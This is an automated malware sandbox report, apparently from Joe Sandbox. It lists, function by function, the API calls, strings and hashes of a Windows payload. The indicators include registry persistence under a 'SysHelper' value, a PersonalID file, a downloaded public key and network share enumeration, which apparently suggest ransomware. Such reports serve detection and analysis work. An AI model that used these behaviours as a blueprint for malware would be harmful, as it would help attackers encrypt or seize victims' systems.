                                                                                                    • Part of subcall function 00481CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00481E48
                                                                                                  • IsWindow.USER32(?), ref: 0048BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 0048BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 0048BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0
                                                                                                  • Opcode ID: bb9346fa5cab909eb050a63a41f3fa65b871602c28a87f03663f3025a51f734b
                                                                                                  • Instruction ID: 0f650a70d44b764bcaa1ee86dac6cc9bcea2b2631298c703fabedc6e9f44e11e
                                                                                                  • Opcode Fuzzy Hash: bb9346fa5cab909eb050a63a41f3fa65b871602c28a87f03663f3025a51f734b
                                                                                                  • Instruction Fuzzy Hash: 87C19E71508340AFDB20EF28D84576FBBE0FF95318F04492EF588963A1D7799808DB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2517 493576-49358f 2518 4935a9-4935be call 49b420 2517->2518 2519 493591-49359b call 495208 call 4942d2 2517->2519 2518->2519 2525 4935c0-4935c3 2518->2525 2526 4935a0 2519->2526 2527 4935c5 2525->2527 2528 4935d7-4935dd 2525->2528 2531 4935a2-4935a8 2526->2531 2532 4935cb-4935d5 call 495208 2527->2532 2533 4935c7-4935c9 2527->2533 2529 4935e9 call 49fb64 2528->2529 2530 4935df 2528->2530 2537 4935ee-4935fa call 49f803 2529->2537 2530->2532 2534 4935e1-4935e7 2530->2534 2532->2526 2533->2528 2533->2532 2534->2529 2534->2532 2541 493600-49360c call 49f82d 2537->2541 2542 4937e5-4937ef call 4942fd 2537->2542 2541->2542 2547 493612-49361e call 49f857 2541->2547 2547->2542 2550 493624-49362b 2547->2550 2551 49369b-4936a6 call 49f939 2550->2551 2552 49362d 2550->2552 2551->2531 2559 4936ac-4936af 2551->2559 2553 49362f-493635 2552->2553 2554 493637-493653 call 49f939 2552->2554 2553->2551 2553->2554 2554->2531 2562 493659-49365c 2554->2562 2560 4936de-4936eb 2559->2560 2561 4936b1-4936ba call 49fbb4 2559->2561 2564 4936ed-4936fc call 4a05a0 2560->2564 2561->2560 2570 4936bc-4936dc 2561->2570 2565 49379e-4937a0 2562->2565 2566 493662-49366b call 49fbb4 2562->2566 2573 493709-493730 call 4a04f0 call 4a05a0 2564->2573 2574 4936fe-493706 2564->2574 2565->2531 2566->2565 2575 493671-493689 call 49f939 2566->2575 2570->2564 2583 49373e-493765 call 4a04f0 call 4a05a0 2573->2583 2584 493732-49373b 2573->2584 2574->2573 2575->2531 2580 49368f-493696 2575->2580 2580->2565 2589 493773-493782 call 4a04f0 2583->2589 2590 493767-493770 2583->2590 2584->2583 2593 4937af-4937c8 2589->2593 2594 493784 2589->2594 2590->2589 2595 49379b 2593->2595 2596 4937ca-4937e3 2593->2596 2597 49378a-493798 2594->2597 2598 493786-493788 2594->2598 2595->2565 2596->2565 2597->2595 2598->2597 2599 4937a5-4937a7 2598->2599 2599->2565 2600 4937a9 2599->2600 2600->2593 2601 4937ab-4937ad 2600->2601 2601->2565 2601->2593
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 004935B1
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  • __gmtime64_s.LIBCMT ref: 0049364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00493680
                                                                                                  • __gmtime64_s.LIBCMT ref: 0049369D
                                                                                                  • __allrem.LIBCMT ref: 004936F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049370F
                                                                                                  • __allrem.LIBCMT ref: 00493726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493744
                                                                                                  • __allrem.LIBCMT ref: 0049375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: fa1974f9c41682421c3f11aee8e61275e8ad34969c8e5080cc82c0f6630bea81
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: D1710AB1A00716BBDF149E7ACC41B5A7BA4AF06329F14827BF514D6781E778EE008798
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00490FDD: __wfsopen.LIBCMT ref: 00490FE8
                                                                                                  • _fgetws.LIBCMT ref: 0047C7BC
                                                                                                  • _memmove.LIBCMT ref: 0047C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0047C94B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  • Opcode ID: d2c378f9c214786ff4fb8e24bb631fc4748bcec33581a3ef8d334ea38ccef476
                                                                                                  • Instruction ID: 0a907968b8b4ba1db9361ed3c8d182b57e4146f1ebebb9eea964c6843bd824a0
                                                                                                  • Opcode Fuzzy Hash: d2c378f9c214786ff4fb8e24bb631fc4748bcec33581a3ef8d334ea38ccef476
                                                                                                  • Instruction Fuzzy Hash: 759182B1D002199BCF20EFA4C9857EFBBB5BF04314F15452EE91963241E779AE04CB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 0047F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0047F353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  • Opcode ID: 4ec2d18c0563d3443add57a5d6a507cd9a92e8fc792293d83846a3cf56fe8a85
                                                                                                  • Instruction ID: 9b2f7e1371b5c9ddbef2266dacc34cc389d46d031cc27d31de2b10293b6c437c
                                                                                                  • Opcode Fuzzy Hash: 4ec2d18c0563d3443add57a5d6a507cd9a92e8fc792293d83846a3cf56fe8a85
                                                                                                  • Instruction Fuzzy Hash: 9CC16D71D01209EBDF00DFA4DD45BDEBBB5BF14308F10842AE409B7291E7B99A19CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0048E6D4), ref: 0047C6C2
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0047C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0047C700
                                                                                                  • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0047C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0047C72E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  • API String ID: 3962714758-1667468722
                                                                                                  • Opcode ID: 1dadafd394fc345a34599f32a63de9fbe8387ab43c224cfee9d1b05eafcdd80c
                                                                                                  • Instruction ID: 0e2600fc9ac7fefe7e6e32c5c04915f685965e10ce02834e27cf15a6e5e5f2fa
                                                                                                  • Opcode Fuzzy Hash: 1dadafd394fc345a34599f32a63de9fbe8387ab43c224cfee9d1b05eafcdd80c
                                                                                                  • Instruction Fuzzy Hash: ED111B75A40208FBDB109F90DD4ABEEBF78FB14704F1041A5EA04B22A1D7B15A18AB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0048E707
                                                                                                    • Part of subcall function 0047C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0047C51B
                                                                                                  • InternetOpenW.WININET ref: 0048E743
                                                                                                  • _wcsstr.LIBCMT ref: 0048E7AE
                                                                                                  • _memmove.LIBCMT ref: 0048E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0048E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0048E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0048E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0048E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0048E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F6
                                                                                                  • _strstr.LIBCMT ref: 0048EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0048EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0048EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EB7C
                                                                                                  • _malloc.LIBCMT ref: 0048EB86
                                                                                                  • _memset.LIBCMT ref: 0048EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0048EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EBB6
                                                                                                  • _strstr.LIBCMT ref: 0048EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 2805819797-1771568745
                                                                                                  • Opcode ID: ae02b21aae53ab03f4e11cfadd86afb1fbf68ce7571f9e30c9b2d0204691acec
                                                                                                  • Instruction ID: 615caff8a2eb2443de93342e75320ab2c4d26d101627f3c1844ffaa2fd94ae1a
                                                                                                  • Opcode Fuzzy Hash: ae02b21aae53ab03f4e11cfadd86afb1fbf68ce7571f9e30c9b2d0204691acec
                                                                                                  • Instruction Fuzzy Hash: 35015271448391AADB30EF619C05BDF7F99AF51704F444C1EF989A2282EB78A20CD75B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(?,?,?,?,0048EE2F), ref: 00481B1E
                                                                                                  • timeGetTime.WINMM(?,?,0048EE2F), ref: 00481B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00481B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481B6A
                                                                                                  • Sleep.KERNEL32(00000064,?,?,0048EE2F), ref: 00481B72
                                                                                                  • timeGetTime.WINMM(?,?,0048EE2F), ref: 00481B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3697694649-0
                                                                                                  • Opcode ID: 3aa2a2081e82dc3f7f0447c93f0b506eecb999da8e5d3498334b0fce6e883a48
                                                                                                  • Instruction ID: c3254dfce82753abd4a5dd286471df2b6364e88bcf89fb49c72a769b522d794e
                                                                                                  • Opcode Fuzzy Hash: 3aa2a2081e82dc3f7f0447c93f0b506eecb999da8e5d3498334b0fce6e883a48
                                                                                                  • Instruction Fuzzy Hash: 6A018432A40319ABDB20A7E59C45FEEB76CBB08B40F044467F700B7290E674B905CBE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0047C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: 48300451616bbb8d2df44df16c34ed5c06c030113f55d412220034fd6e03dc6f
                                                                                                  • Instruction ID: 58a842e775ee42d50a2dbf0779a3cf5e6dbf3987139a3b6faa07852d65f43562
                                                                                                  • Opcode Fuzzy Hash: 48300451616bbb8d2df44df16c34ed5c06c030113f55d412220034fd6e03dc6f
                                                                                                  • Instruction Fuzzy Hash: F8110AB2A8122433DD30756A6C87FEB7B5C9B42725F0000BBFE0C93242E56A995542E5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0048BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0048BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 0048BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  • Opcode ID: b21cb6a465a005b1a5acaf46fb132b5feb153110e6b7651a88e60f0277b0afef
                                                                                                  • Instruction ID: 7636b9d801a53305cdcd2d45398ed29b5673c7b110df190457598cd890aa85d0
                                                                                                  • Opcode Fuzzy Hash: b21cb6a465a005b1a5acaf46fb132b5feb153110e6b7651a88e60f0277b0afef
                                                                                                  • Instruction Fuzzy Hash: 14E01A3168172076E33157147C0AF9A2914E711F10F208409FA01793D086E5A945AB8C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00480C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00480C39
                                                                                                  • _memset.LIBCMT ref: 00480C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00480C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  • Opcode ID: 269e7239be94ed33d2b5e63fb904e24d35aa83345966c4a3d723735a692455b2
                                                                                                  • Instruction ID: 17b9be6439c778431c977451562c0c483f8befa1fd78009482e048c737ba6902
                                                                                                  • Opcode Fuzzy Hash: 269e7239be94ed33d2b5e63fb904e24d35aa83345966c4a3d723735a692455b2
                                                                                                  • Instruction Fuzzy Hash: C2919B756183418FD768EF68C851B6FB7E1FF84704F148D1EE48A87380D778A9488B5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

